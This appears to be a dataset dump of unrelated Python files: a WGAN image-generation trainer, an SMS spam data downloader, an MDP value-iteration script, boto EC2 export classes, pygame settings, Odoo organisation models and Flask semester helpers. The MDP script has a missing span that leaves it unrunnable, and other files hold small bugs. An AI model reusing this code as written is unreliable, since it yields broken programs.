label=f'{countries_interest[i]} Deaths')\n\t# \tax.plot(data_sets[i].index, data_sets[i]['deaths'], color='grey', alpha=0.3)\n\t# \ti += 1\n\t# fig.legend(bbox_to_anchor=(-0.15, 0.25, 0.5, 0.5))\n\t# fig.suptitle('Countries of interest timeline')\n\t# ax.set_xlabel('Dates')\n\t# pl.show()","sub_path":"countries copy.py","file_name":"countries copy.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558559755","text":"\nimport os\nimport 
time\nimport math\nfrom PIL import Image \n\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorlayer as tl\n\nfrom glob import glob\n\nfrom utils import get_image\nfrom model_u2_3d_d2 import generator, discriminator1, discriminator2\n#from skimage import img_as_ubyte\n\n# Define TF Flags\nflags = tf.app.flags\nflags.DEFINE_integer(\"epoch\",1000, \"Epoch to train [2000]\")\nflags.DEFINE_float(\"learning_rate\", 0.0002, \"Learning rate of for adam [0.0002]\")\nflags.DEFINE_float(\"learning_rate2\", 0.00005, \"Learning rate of for RMSProp [0.00005]\")\nflags.DEFINE_float(\"beta1\", 0.5, \"Momentum term of adam [0.5]\")\nflags.DEFINE_float(\"train_size\", np.inf, \"The size of train images [np.inf]\")\nflags.DEFINE_integer(\"batch_size\",8 , \"The number of batch images [2]\")########\nflags.DEFINE_integer(\"image_size\", 128, \"The size of image to use (will be center cropped) [128]\")############\nflags.DEFINE_integer(\"output_size\", 128, \"The size of the output images to produce [128]\")\nflags.DEFINE_integer(\"sample_size\", 128, \"The number of sample images [128]\")\nflags.DEFINE_integer(\"c_dim\", 1, \"Dimension of image color. [1]\")\nflags.DEFINE_integer(\"sample_step\", 50, \"The interval of generating sample. [50]\")\nflags.DEFINE_integer(\"save_step\", 50, \"The interval of saveing checkpoints. [50]\")\nflags.DEFINE_string(\"dataset\", \"model_u2_3d_d2\", \"The name of dataset [coil-20, plant6]\")\nflags.DEFINE_string(\"checkpoint_dir\", \"checkpoint\", \"Directory name to save the checkpoints [checkpoint]\")\nflags.DEFINE_string(\"sample_dir\", \"samples\", \"Directory name to save the image samples [samples]\")\nflags.DEFINE_boolean(\"is_train\", False, \"True for training, False for testing [False]\")\nflags.DEFINE_boolean(\"is_crop\", True, \"True for training, False for testing [False]\")\nflags.DEFINE_boolean(\"visualize\", False, \"True for visualizing, False for nothing [False]\")\nFLAGS = flags.FLAGS\n\ndef main(_):\n\n # Print flags #///make flag to be object\n for flag, _ in FLAGS.__flags.items():\n print('\"{}\": {}'.format(flag, getattr(FLAGS, flag)))\n print(\"--------------------\")\n\n # Configure checkpoint/samples dir\n tl.files.exists_or_mkdir(FLAGS.checkpoint_dir)\n tl.files.exists_or_mkdir(FLAGS.sample_dir)\n\n CLIP = [-0.01,0.01]\n CRITIC_NUM = 5\n#read gaussian\n\n data_files = os.listdir(\"./gaussian_dataset\")\n num_files = len(data_files)\n for i in range(num_files):\n data_files[i]= int(data_files[i].split('.')[0].split('_')[2])\n # print(data_files)\n\n\n\n data_files.sort()\n\n #print(data_files)\n\n\n\n\n for i in range(num_files):\n data_files[i] = \"./gaussian_dataset/gaussianheavy_blackaverage_\"+str(data_files[i]).zfill(4)+\".png\"\n\n###############################################################\n images=[]\n\n for file in data_files:\n image = get_image(file, FLAGS.image_size, is_crop=FLAGS.is_crop, resize_w=FLAGS.output_size, is_grayscale = False)\n \n #bark36-color channel=3\n image = image[:,:,np.newaxis]\n\n #print(image.shape)\n #time.sleep(5)\n images.append(image)\n\n # Construct graph on GPU\n with tf.device(\"/gpu:0\"):\n\n #Define Models #\n ################################################################################################\n\n x_l = tf.placeholder(tf.float32, [None,1],name='x_noise')\n y_l = tf.placeholder(tf.float32, [None,1],name = 'y_noise')\n z_l = tf.placeholder(tf.float32, [None,1],name = 'z_noise')\n #z = [tf.cos(theta),tf.sin(theta)]\n # x_l = 10*tf.sin(phi)*tf.cos(theta)\n # y_l = 
10*tf.sin(phi)*tf.sin(theta)\n # z_l = 10*tf.cos(phi)\n\n z = tf.concat([x_l,y_l,z_l],axis=1)\n \n\n real_images = tf.placeholder(tf.float32, [None, FLAGS.output_size, FLAGS.output_size, FLAGS.c_dim], name='real_images')\n\n sess = tf.InteractiveSession()\n\n # Input noise into generator for training####################reuse\n net_g = generator(z , is_train=True, reuse=False)\n #net_g = generator(z , is_train=True, reuse=True)\n\n # Input real and generated fake images into discriminator for training\n net_d1, d1g_logits1 = discriminator1(net_g.outputs, is_train=True, reuse=False)\n #net_d, d_logits = discriminator(net_g.outputs, is_train=True, reuse=True)\n _, d1x_logits1 = discriminator1(real_images, is_train=True, reuse=True)\n\n # Input noise into generator for ###################################evaluation\n # set is_train to False so that BatchNormLayer behave differently\n net_g2 = generator(z, is_train=False, reuse=True)\n\n\n\n\n#######WWWWWWWWWWWWWWGAN\n #Define Training Operations #\n # discriminator: real images are labelled as 1 ##############by using tf.ones_like(),make every tensor to be 1,as target\n d1_loss_real = -tf.reduce_mean(d1x_logits1, name='d1real')\n # discriminator: images from generator (fake) are labelled as 0\n d1_loss_fake = tf.reduce_mean(d1g_logits1, name='d1fake')\n # cost for updating discriminator\n d1_loss = 0.5*(d1_loss_real + d1_loss_fake)\n\n\n\n\n\n #d2\n # Input real and generated fake images into discriminator for training\n net_d2, d2g_logits2 = discriminator2(net_g.outputs, is_train=True, reuse=False)\n #net_d, d_logits = discriminator(net_g.outputs, is_train=True, reuse=True)\n _, d2x_logits2 = discriminator2(real_images, is_train=True, reuse=True)\n\n #with tf.name_scope(\"d2_loss_real\"):\n d2_loss_real = tf.reduce_mean(d2x_logits2, name='d2real')\n # discriminator: images from generator (fake) are labelled as 0\n #with tf.name_scope(\"d2_loss_real\"):\n d2_loss_fake = -tf.reduce_mean(d2g_logits2, name='d2fake')\n # cost for updating discriminator\n #with tf.name_scope(\"d2_loss\"):\n d2_loss = 0.5*(d2_loss_real + d2_loss_fake)\n\n\n #with tf.name_scope(\"d_loss\"):\n d_loss = d1_loss + d2_loss\n\n h4_params = tl.layers.get_variables_with_name(name='discriminator/d/h4/lin_sigmoid', train_only=True)\n h5_params = tl.layers.get_variables_with_name(name='discriminator/d/h5/lin_sigmoid', train_only=True)\n l2_params = h4_params + h5_params\n l2_wl = 0.0002\n \n for p in l2_params:\n weight_loss = tf.multiply(tf.nn.l2_loss(p), l2_wl)\n d_loss += weight_loss\n\n # generator: try to make the the fake images look real (1)\n g1_loss = -tf.reduce_mean(d1g_logits1, name='g1fake')\n g2_loss = tf.reduce_mean(d2g_logits2, name='g2fake')####\n g_loss = 0.5*(g1_loss + g2_loss)\n\n\n g_vars = tl.layers.get_variables_with_name('generator', True, True)\n d_vars = tl.layers.get_variables_with_name('discriminator', True, True)\n\n # Define optimizers for updating discriminator and generator\n d_optim = tf.train.RMSPropOptimizer(FLAGS.learning_rate2) \\\n .minimize(d_loss, var_list=d_vars)\n g_optim = tf.train.RMSPropOptimizer(FLAGS.learning_rate2) \\\n .minimize(g_loss, var_list=g_vars)\n clip_d_op = [var.assign(tf.clip_by_value(var,CLIP[0],CLIP[1])) for var in d_vars]\n # Init Session\n #sess = tf.InteractiveSession()\n\n f = pd.read_csv('./plant6.csv')\n f.columns = [\"COL1\",\"COL2\",\"COL3\"]\n\n x_label = f[[\"COL1\"]]\n x_label = np.array(x_label)\n\n y_label = f[[\"COL2\"]]\n y_label = np.array(y_label)\n\n z_label = f[[\"COL3\"]]\n z_label = 
np.array(z_label)\n\n\n index2 = np.arange(0,72,1)\n # for i in range(num_files):\n # x_label[i] = x_label\n # y_label[i] = y_label\n # z_label[i] = z_label\n images = np.asarray(images)\n sample_x_label= x_label[index2]\n sample_y_label= y_label[index2]\n sample_z_label= z_label[index2]\n sample_image = images[index2]\n batch_x_label = x_label[index2]\n batch_y_label = y_label[index2]\n batch_z_label = z_label[index2]\n batch_images = images[index2]\n\n\n\n with tf.name_scope('summary'):\n\n\n\n\n\n\n tf.summary.scalar('d1_loss', d1_loss)\n tf.summary.scalar('d2_loss', d2_loss)\n tf.summary.scalar('d_loss', d_loss)\n tf.summary.scalar('g1_loss', g1_loss)\n tf.summary.scalar('g2_loss', g2_loss)\n tf.summary.scalar('g_loss', g_loss)\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter('./logs', sess.graph)\n\n\n\n sess.run(tf.global_variables_initializer())\n\n model_dir = \"%s_%s_%s\" % (FLAGS.dataset, FLAGS.batch_size, FLAGS.output_size)\n save_dir = os.path.join(FLAGS.checkpoint_dir, model_dir)\n tl.files.exists_or_mkdir(FLAGS.sample_dir)\n tl.files.exists_or_mkdir(save_dir)\n\n # load the latest checkpoints\n net_g_name = os.path.join(save_dir, 'net_g.npz')\n net_d1_name = os.path.join(save_dir, 'net_d1.npz')\n net_d2_name = os.path.join(save_dir, 'net_d2.npz')\n\n\n\n #Training models #\n iter_counter = 0\n index = np.arange(72)\n for epoch in range(FLAGS.epoch):\n np.random.shuffle(index)\n\n #steps = 0\n for start_index in range(0, 72, FLAGS.batch_size):\n end_index = start_index+FLAGS.batch_size\n start_time = time.time()\n\n\n if start_index < 25 or start_index%500 == 0:\n critic_num = 25\n else:\n critic_num = CRITIC_NUM\n\n for _ in range(critic_num):\n\n # Updates the Discriminator(D)\n summary, errD, _ = sess.run([merged, d_loss, d_optim], feed_dict={x_l: batch_x_label[index[start_index:end_index]],\n y_l: batch_y_label[index[start_index:end_index]],z_l: batch_z_label[index[start_index:end_index]], \n real_images: batch_images[index[start_index:end_index]]})\n sess.run(clip_d_op)\n \n # Updates the Generator(G)\n # run generator twice to make sure that d_loss does not go to zero (different from paper)##########################\n for _ in range(2):\n errG, _ = sess.run([g_loss, g_optim], feed_dict={x_l: batch_x_label[index[start_index:end_index]],\n y_l: batch_y_label[index[start_index:end_index]],z_l: batch_z_label[index[start_index:end_index]]})\n \n end_time = time.time() - start_time\n #print(\"Epoch: [%2d/%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f\" \\\n # % (epoch, FLAGS.epoch, steps, batch_steps, end_time, errD, errG))\n print(\"Epoch: [%2d/%2d] time: %4.4f, d_loss: %.8f, g_loss: %.8f\" \\\n % (epoch, FLAGS.epoch, end_time, errD, errG))\n\n iter_counter += 1\n if np.mod(iter_counter, FLAGS.sample_step) == 0:\n # Generate images########################################################################the diffrence with feed-z_batch ?\n img, errD, errG = sess.run([net_g2.outputs, d_loss, g_loss], feed_dict={x_l:sample_x_label,y_l:sample_y_label,z_l:sample_z_label, real_images: sample_image})\n # Visualize generated images\n #tl.visualize.save_images(img, [num_tiles, num_tiles], './{}/train_{:02d}_{:04d}.png'.format(FLAGS.sample_dir, epoch, steps))\n print(\"[Sample] d_loss: %.8f, g_loss: %.8f\" % (errD, errG))\n\n if np.mod(iter_counter, FLAGS.save_step) == 0:\n # Save current network parameters\n print(\"[*] Saving checkpoints...\")\n tl.files.save_npz(net_g.all_params, name=net_g_name, sess=sess)\n tl.files.save_npz(net_d1.all_params, 
name=net_d1_name, sess=sess)\n tl.files.save_npz(net_d2.all_params, name=net_d2_name, sess=sess)\n print(\"[*] Saving checkpoints SUCCESS!\")\n writer.add_summary(summary, iter_counter)\n\n print(\"finish training, start testing...\")\n\n\n\n\n\n #150\n # noise_theta = np.zeros(shape = [150,1],dtype = np.float32)\n # for i in range(150):\n # noise_theta[i] = np.array([(360.0/150.0)*i*math.pi/180])\n\n # index = np.arange(0,150,1)\n # test_theta =noise_theta[index]\n\n # generated_images = sess.run(net_g2.outputs, \n # feed_dict={\n # theta: test_theta,\n # })\n\n \n\n t = pd.read_csv('./location_150.csv')\n t.columns = [\"COL1\",\"COL2\",\"COL3\"]\n x_test = t[[\"COL1\"]]\n x_test = np.array(x_test)\n\n y_test = t[[\"COL2\"]]\n y_test = np.array(y_test)\n\n z_test = t[[\"COL3\"]]\n z_test = np.array(z_test)\n\n index = np.arange(0,150,1)\n x_test = x_test[index]\n y_test = y_test[index]\n z_test = z_test[index]\n\n generated_images = sess.run(net_g2.outputs, \n feed_dict={\n x_l: x_test,y_l:y_test ,z_l: z_test,\n })\n\n #img=[]\n for i in range(150):\n #img = img_as_ubyte(generated_images[i])\n\n #tf.image.encode_png(generated_images[i],compression=-1,name=None)\n\n # mn = generated_images[i].min()\n # mx = generated_images[i].max()\n # mx -= mn\n # generated_images[i]=generated_images[i].astype(np.uint8)\n #generated_images[i] = generated_images[i]/generated_images[i].max()\n #generated_images[i] = 255*generated_images[i]\n \n\n #tl.visualize.save_image(generated_images[i].astype(np.uint8), './{}/train_{:02d}.png'.format(FLAGS.sample_dir, i))\n #steps += 1\n generated_images[i] = 128*generated_images[i]+127\n np.clip(generated_images[i],0,255)\n \n\n tl.visualize.save_image(generated_images[i].astype(np.uint8), './{}/train_{:02d}.png'.format(FLAGS.sample_dir, i))\n\n print(\"testing is finished\")\n writer.close()\n sess.close()\n\n\nif __name__ == '__main__':\n try:\n tf.app.run()\n except KeyboardInterrupt:\n print('EXIT')\n\n\n\n\n\n\n\n\"\"\"\n\n #72\n # noise_x = np.zeros(shape = [200,1] ,dtype = np.float32)\n # noise_y = np.zeros(shape = [200,1] ,dtype = np.float32)\n # noise_z = np.zeros(shape = [200,1] ,dtype = np.float32)\n\n noise_theta = np.zeros(shape = [200,1] ,dtype = np.float32)\n noise_phi = np.zeros(shape = [200,1] ,dtype = np.float32)\n\n\n\n\n\n\n\n for i in range(200):\n\n # noise_x[i] = 10*tf.sin((180.0/200.0)*i*math.pi/180)*tf.cos((360.0/200.0)*i*math.pi/180)\n # noise_y[i] = 10*tf.sin((180.0/200.0)*i*math.pi/180)*tf.sin((360.0/200.0)*i*math.pi/180)\n # noise_z[i] = 10*tf.cos((180.0/200.0)*i*math.pi/180)\n # phi = np.random.uniform(0,math.pi/180)\n # theta = np.random.uniform(0,2*math.pi/180)\n noise_theta[i] = np.array([(360.0/200.0)*i*math.pi/180])\n noise_phi[i] = np.array([(180.0/200.0)*i*math.pi/180])\n # noise_z[i] = np.array([10*tf.cos(phi)])\n\n\n\n index = np.arange(0,200,1)\n test_theta =noise_theta[index]\n test_phi =noise_phi[index]\n\n test_x = 10*tf.sin(test_phi)*tf.cos(test_theta)\n test_y = 10*tf.sin(test_phi)*tf.sin(test_theta)\n test_z = 10*tf.cos(test_phi)\n\n\n\"\"\"\n","sub_path":"tensorflow1.14/viewpoint_expansion/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"387768916","text":"\"\"\"\nDownload and extract data.\n\"\"\"\nimport urllib.request\nimport zipfile\n\nfrom deploy_model.util import remove_file, ensure_path_exists\nfrom train_model.util import REGRESSION_DATA_DIR, DATASET_DIR\n\n# URL = 
'http://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip'\n# URL = 'https://surfdrive.surf.nl/files/index.php/s/OZRd9BcxhGkxTuy/download' # V2\n# URL = 'https://surfdrive.surf.nl/files/index.php/s/H4e35DvjaX18pTI/download' # V3\nURL = 'https://surfdrive.surf.nl/files/index.php/s/HU5mY29RzxRlHCU/download' # V4\n\nensure_path_exists(DATASET_DIR)\nensure_path_exists(REGRESSION_DATA_DIR)\n\ndef get_data():\n '''Get the production data.'''\n zip_path, _ = urllib.request.urlretrieve(URL)\n with zipfile.ZipFile(zip_path, \"r\") as file:\n file.extractall(REGRESSION_DATA_DIR)\n\n remove_file(REGRESSION_DATA_DIR + '/SMSSpamCollection_diff')\n\n with open(REGRESSION_DATA_DIR + '/SMSSpamCollection', 'r') as src, \\\n open(DATASET_DIR + '/SMSSpamCollection', 'r') as diff, \\\n open(REGRESSION_DATA_DIR + '/SMSSpamCollection_diff', 'a') as dest:\n nonempty_lines = [line.strip(\"\\n\") for line in diff if line != \"\\n\"]\n ignore = len(nonempty_lines)\n i = 0\n for line in src:\n if i >= ignore:\n dest.write(line)\n i = i + 1\n\nif __name__ == 'main':\n get_data()\n","sub_path":"production_endpoint/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"547383507","text":"#-------------------------------------Imports--------------------------------------------------------#\nimport numpy as np\nimport random\nfrom queue import Queue\nimport copy\n\n\n\n#-------------------------------Initialisation and declaration----------------------------------#\nN = 2\nlamda = 0.9 #discount factor\nState = np.zeros((N,N), dtype=int)\nno_of_state = N*N\nno_of_iter = 6\nfor i in range(N):\n for j in range(N):\n State[i,j] = i*N+j \nprint(State)\n\nActionlist = [\"L\", \"U\", \"R\", \"D\"]\nrewards = {}\nno_of_rewards = 5\nreward_limit = 100\nwhile(len(rewards) max:\n max = temp_reward\n V[no_of_iter-1][s] = max\n\n# print(V)\n\n\ndef fun_V(temp_k,s):\n if temp_k == no_of_iter-1:\n return V[no_of_iter-1][s]\n max = 0\n j_wrt_max = 0\n for j,a in enumerate(Actionlist):\n if (s,a) in rewards.keys():\n temp_reward = rewards[(s,a)]\n else:\n temp_reward = 0\n\n other_part = 0\n for next_s in range(no_of_state):\n other_part +=(lamda*Transition_prob[s,next_s,j]*fun_V(temp_k+1,next_s))\n sum_temp = temp_reward+other_part\n if sum_temp > max:\n max = sum_temp\n j_wrt_max = j\n # V[temp_k][s] = max\n pi[temp_k][s] = j_wrt_max\n return max\n\nfor k in range(no_of_iter):\n k = (no_of_iter-1)-k\n print(\"k=\",k)\n for s in range(no_of_state):\n print(\"s=\",s)\n V[k][s] = fun_V(k,s)\n print(V[k],pi[k])\nprint(V)\n\n\n\n","sub_path":"9_week/cricket.py","file_name":"cricket.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"565206906","text":"def find_mid(lst):\n # Write your code here\n if lst.get_head() is None:\n return None\n temp = lst.get_head()\n i = 1\n while temp:\n temp = temp.next_element\n i += 1\n lst_len = i + 1\n if lst_len % 2 == 0:\n mid_step = lst_len // 2 - 1\n else:\n mid_step = lst_len // 2\n\n fir = lst.get_head()\n while mid_step > 0:\n fir = fir.next_element\n mid_step -= 1\n\n return fir.data","sub_path":"datastructure/middleValue.py","file_name":"middleValue.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114612434","text":"from boto.ec2.ec2object import 
EC2Object\n\n\nclass ExportTask(EC2Object):\n \"\"\"\n Represents an EC2 ExportTask\n \"\"\"\n\n def __init__(self, connection=None):\n EC2Object.__init__(self, connection)\n self.request_id = None\n self.description = None\n self.id = None\n self.container_format = None\n self.disk_image_format = None\n self.bucket_name = self.s3_bucket = None\n self.bucket_path = self.s3_key = None\n self.instance_id = None\n self.target_environment = None\n self.state = None\n self.status_message = None\n self.volume_export_details = None\n\n def startElement(self, name, attrs, connection):\n retval = EC2Object.startElement(self, name, attrs, connection)\n if retval is not None:\n return retval\n\n if name == 'volumeExportDetails':\n self.volume_export_details = VolumeExportDetails()\n return self.volume_export_details\n return None\n\n def endElement(self, name, value, connection):\n if name == 'exportTaskId':\n self.id = value\n elif name == 'containerFormat':\n self.container_format= value\n elif name == 'diskImageFormat':\n self.disk_image_format = value\n elif name == 's3Bucket':\n self.bucket_name = self.s3_bucket = value\n elif name == 's3Key':\n self.bucket_path = self.s3_key = value\n elif name == 'instanceId':\n self.instance_id = value\n elif name == 'targetEnvironment':\n self.target_environment = value\n elif name == 'statusMessage':\n self.status_message= value\n else:\n setattr(self, name, value)\n\n\nclass ExportVolumeTask(ExportTask):\n \"\"\"\n Represents custom EC2 ExportVolumeTask\n \"\"\"\n\n def __init__(self, connection=None):\n super(ExportVolumeTask, self).__init__(connection)\n self.volume_id = None\n\n def endElement(self, name, value, connection):\n super(ExportVolumeTask, self).endElement(name, value, connection)\n if name == \"volumeId\":\n self.volume_id = value\n\n\nclass VolumeExportDetails(list):\n def __init__(self, connection=None):\n list.__init__(self)\n self.connection = connection\n\n def startElement(self, name, attrs, connection):\n if name == 'item':\n item = ExportVolumeTask(self)\n self.append(item)\n return item\n\n def endElement(self, name, value, connection):\n pass\n","sub_path":"boto/ec2/export_task.py","file_name":"export_task.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"44009409","text":"import pygame as pg\nfrom random import shuffle\nvec = pg.math.Vector2\n\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nDARKGREY = (40, 40, 40)\nLIGHTGREY = (100, 100, 100)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\nBROWN = (106, 55, 5)\nCYAN = (0, 0, 255)\n\n# game settings\nWIDTH = 1024 # 16 * 64 or 32 * 32 or 64 * 16\nHEIGHT = 768 # 16 * 48 or 32 * 24 or 64 * 12\nFPS = 60\nTITLE = \"LEGEND OF PENGUINS python edition\"\n\nTILESIZE = 64\nGRIDWIDTH = WIDTH / TILESIZE\nGRIDHEIGHT = HEIGHT / TILESIZE\n\n# Player settings\nPLAYER_HEALTH = 780\nPLAYER_SPEED = 280\nPLAYER_ROT_SPEED = 200\nPLAYER_IMG = 'penguin.png'\nPLAYER_HIT_RECT = pg.Rect(0, 0, 35, 35)\nBARREL_OFFSET = vec(30, 0)\n\n# Weapon settings\nBULLET_IMG = 'bullet.png'\nWEAPONS = {}\nWEAPONS['machine'] = {'bullet_speed': 500,\n 'bullet_lifetime': 1000,\n 'rate': 100,\n 'kickback': 150,\n 'spread': 5,\n 'damage': 75,\n 'bullet_size': 'lg',\n 'bullet_count': 1}\nWEAPONS['precision'] = {'bullet_speed': 500,\n 'bullet_lifetime': 100000,\n 'rate': 300,\n 'kickback': 100,\n 'spread': 0,\n 'damage': 100,\n 'bullet_size': 'lg',\n 'bullet_count': 1}\n\n# Mob 
settings\nMOB_IMG = 'ManBlue_hold.png'\nMOB_SPEEDS = [150, 100, 75, 125]\nMOB_HIT_RECT = pg.Rect(0, 0, 30, 30)\nMOB_HEALTH = 600\nMOB_DAMAGE = 50\nMOB_KNOCKBACK = 20\nAVOID_RADIUS = 50\nDETECT_RADIUS = 400\n\n# Effects\nMUZZLE_FLASHES = ['smoke_01.png', 'smoke_02.png', 'smoke_03.png',\n 'smoke_04.png', 'smoke_05.png', 'smoke_06.png',\n 'smoke_07.png', 'smoke_08.png', 'smoke_09.png',\n 'smoke_10.png']\nFLASH_DURATION = 50\nDAMAGE_ALPHA = [i for i in range(0, 255, 55)]\nNIGHT_COLOR = (20, 20, 20)\nLIGHT_RADIUS = (500, 500)\nLIGHT_MASK = \"light_350_med.png\"\n\n# Layers\nWALL_LAYER = 1\nPLAYER_LAYER = 2\nBULLET_LAYER = 3\nMOB_LAYER = 2\nEFFECTS_LAYER = 4\nITEMS_LAYER = 1\n\n# Items\nITEM_IMAGES = {'health': 'health_pack.png',\n 'precicion': 'hitpro.png'}\nHEALTH_PACK_AMOUNT = 62\nBOB_RANGE = 10\nBOB_SPEED = 0.3\n\n# Sounds\nmusic = ['Happy Tune.wav']\nshuffle(music)\nBG_MUSIC = music[0]\nWEAPON_SOUNDS = {'machine': ['pistol.wav'],\n 'precision': ['shotgun.wav']}\nEFFECTS_SOUNDS = {'level_start': 'level_start.wav',\n 'health_up': 'health_pack.wav',}","sub_path":"UTS/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"201051338","text":"# -*- coding: utf-8 -*-\nfrom openerp import fields, models\nfrom openerp.addons.pabi_base.models.res_common import ResCommon\n\n# ORG Structure:\n# (mission)\n# costcenter\n# o\n# |\n# m\n# org -> sector -> subsector -> division -> section\n#\n# * Now, if section:costcenter = 1:1, choose costcenter will know section\n# * In future, if section:costcenter = 2:1, user will have to choose section\n\n\nclass ResOrg(ResCommon, models.Model):\n _name = 'res.org'\n _description = 'Org'\n\n operating_unit_id = fields.Many2one(\n 'operating.unit',\n string='Operating Unit',\n )\n logo = fields.Binary(\n string='Logo',\n )\n name_print_text = fields.Char(\n string='Print Name',\n translate=True,\n )\n address_print_text = fields.Text(\n string='Print Address',\n translate=True,\n )\n branch_200 = fields.Text(\n string='Branch 200%',\n translate=True,\n )\n\n\nclass ResSector(ResCommon, models.Model):\n _name = 'res.sector'\n _description = 'Sector'\n\n org_id = fields.Many2one(\n 'res.org',\n string='Org',\n required=True,\n )\n\n\nclass ResSubsector(ResCommon, models.Model):\n _name = 'res.subsector'\n _description = 'Subsector'\n\n sector_id = fields.Many2one(\n 'res.sector',\n string='Sector',\n required=True,\n )\n org_id = fields.Many2one(\n 'res.org',\n related='sector_id.org_id',\n string='Org',\n readonly=True,\n store=True,\n )\n\n\nclass ResDivision(ResCommon, models.Model):\n _name = 'res.division'\n _description = 'Division'\n\n subsector_id = fields.Many2one(\n 'res.subsector',\n string='Subsector',\n required=True,\n )\n sector_id = fields.Many2one(\n 'res.sector',\n related='subsector_id.sector_id',\n string='Sector',\n readonly=True,\n required=True,\n )\n org_id = fields.Many2one(\n 'res.org',\n related='subsector_id.org_id',\n string='Org',\n readonly=True,\n store=True,\n )\n\n\nclass ResSection(ResCommon, models.Model):\n _name = 'res.section'\n _description = 'Section'\n\n division_id = fields.Many2one(\n 'res.division',\n string='Division',\n required=True,\n )\n costcenter_id = fields.Many2one(\n 'res.costcenter',\n string='Costcenter',\n required=True,\n )\n subsector_id = fields.Many2one(\n 'res.subsector',\n related='division_id.subsector_id',\n string='Subsector',\n readonly=True,\n store=True,\n )\n sector_id = 
fields.Many2one(\n 'res.sector',\n related='division_id.sector_id',\n string='Sector',\n readonly=True,\n store=True,\n )\n org_id = fields.Many2one(\n 'res.org',\n related='division_id.org_id',\n string='Org',\n readonly=True,\n store=True,\n )\n mission_id = fields.Many2one(\n 'res.mission',\n string='Mission',\n required=False,\n )\n fund_ids = fields.Many2many(\n 'res.fund',\n 'res_fund_section_rel',\n 'section_id', 'fund_id',\n string='Funds',\n default=lambda self: self.env.ref('base.fund_nstda'),\n )\n\n\nclass ResCostcenter(ResCommon, models.Model):\n _name = 'res.costcenter'\n _description = 'Cost Center'\n\n section_ids = fields.One2many(\n 'res.section',\n 'costcenter_id',\n string='Sections',\n readonly=True,\n )\n taxbranch_id = fields.Many2one(\n 'res.taxbranch',\n string='Tax Branch',\n required=False,\n )\n\n\nclass ResTaxbranch(ResCommon, models.Model):\n _name = 'res.taxbranch'\n _description = 'Tax Branch'\n\n street = fields.Char(\n string='Street',\n translate=True,\n )\n street2 = fields.Char(\n string='Street2',\n translate=True,\n )\n zip = fields.Char(\n string='Zip',\n )\n city = fields.Char(\n string='City',\n translate=True,\n )\n country_id = fields.Many2one(\n 'res.country',\n string='Country',\n )\n email = fields.Char(\n string='Email',\n )\n phone = fields.Char(\n string='Phone',\n )\n fax = fields.Char(\n string='Fax',\n )\n website = fields.Char(\n string='website',\n )\n taxid = fields.Char(\n string='Tax ID',\n )\n address_print_text = fields.Text(\n string='Print Address',\n translate=True,\n )\n address_print_text_receipt = fields.Text(\n string='Print Address (Receipt)',\n translate=True,\n )\n payment_method_text = fields.Text(\n string='Print Payment Method',\n translate=True,\n )\n # org_id = fields.Many2one(\n # 'res.org',\n # string='Org',\n # required=True,\n # )\n","sub_path":"pabi_base/models/res_org_structure.py","file_name":"res_org_structure.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"544829035","text":"from app.models import db\nfrom app.models.semestre import Semestre\nfrom app.models.semestre_especialidad import Semestre_especialidad\nfrom app.models.especialidad import Especialidad\nfrom app.models.curso import Curso\n\ndef crearSemestre(nombreSemestre):\n objSemestre = Semestre(nombre = nombreSemestre,flg_activo = 0)\n Semestre().addOne(objSemestre)\n return { 'message' : 'Se agrego correctamente'}\n\ndef listarSemestresNoActivos():\n semestres = Semestre().getAllNoActivos().all()\n lstSemestre = []\n for semestre in semestres:\n aux ={}\n aux['nombre'] = semestre.nombre\n aux['idSemestre'] = semestre.id_semestre\n lstSemestre.append(aux)\n\n return lstSemestre\n\ndef activarSemestre(idSemestre):\n Semestre().activar(idSemestre) \n Semestre_especialidad().activacionSemestre(idSemestre)\n return { 'message' : 'Se agrego correctamente'}\n\n\n\n\ndef obtenerlistaSemestresNoActivos():\n listaSemestres = Semestre.getAll()\n lista = list()\n for semestre in listaSemestres:\n c = {}\n c['id_semestre'] = semestre.id_semestre\n c['nombre'] = semestre.nombre\n lista.append(c)\n\n listaS = {}\n listaS['listaSemestres'] = lista\n \n return listaS\n\n\ndef obtenerEspecialidadxSemestre():\n semestreActivo = Semestre().getOne()\n idsemestre = semestreActivo.id_semestre\n especialidades = Semestre_especialidad().obtenerEspecialidadActivo(idsemestre)\n print(especialidades)\n lista = list()\n for especialidad in especialidades:\n idespecialidad = 
